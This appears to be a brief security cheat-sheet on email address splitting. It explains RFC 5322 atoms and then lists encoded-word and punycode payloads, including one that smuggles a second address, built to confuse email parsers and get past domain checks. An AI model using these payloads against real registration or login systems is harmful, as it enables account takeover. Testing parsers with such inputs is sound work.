What is Email Atom
An email atom refers to a specific segment or unit of an email address based on the syntax rules defined in RFC 5322. It is a sequence of characters in the email's local-part or domain that is not enclosed in quotes and is separated from other segments by dots. For example, in the email address john.doe@example.com, john and doe are atoms in the local-part, while example and com are atoms in the domain. Atoms are fundamental building blocks that conform to specific character rules, ensuring the email address is syntactically valid.
Exploitation
# Single encoding
=?utf-7?q?&AGYAbwBvAGIAYQBy-?=email@collaborator.com
=?utf-8?q?=41=42=43?=email@collaborator.com
=?utf-8?q?=61=62=63?=email@collaborator.com
?iso-8859-1?q?=61=62=63?=email@collaborator.com
=?utf-8?b?Zm9vYmFy?=email@collaborator.com
---------------------------------------------------------------------------------
# Blending Option (Combine )
=?utf-7?q?&=41GYAbwBvAGIAYQBy-?=email@collaborator.com ---> =41 -> A
=?utf-7?b?JkFHWUFid0J2QUdJQV1RQnkt?=email@collaborator.com ---> B Encoded -> UTF-7
=?iso-8859-1?q?email=40domain.com=3e=00?=ingored@email.com
---------------------------------------------------------------------------------
# Punny Code
psres.net.com.xn--0049.com.psres.net ---> psres.net.com.,.com.psres.net
foo@xn--0117.example.com ---> foo@@.example.com- UTF-7 ---> Like base64 (To complicated so people use UTF-8)
- UTF-8 ---> Encode any character in Unicode standard, supporting multilingual text.
- iso-8859-1 ---> Limited to 256 characters, focusing on Western European languages.
- Q-Encoding(q) ---> Encode non-ASCII characters
- Base64(b) ---> Base64 encoding
More Information
https://www.youtube.com/watch?v=JERBqoTllaE&t=6s (opens in a new tab)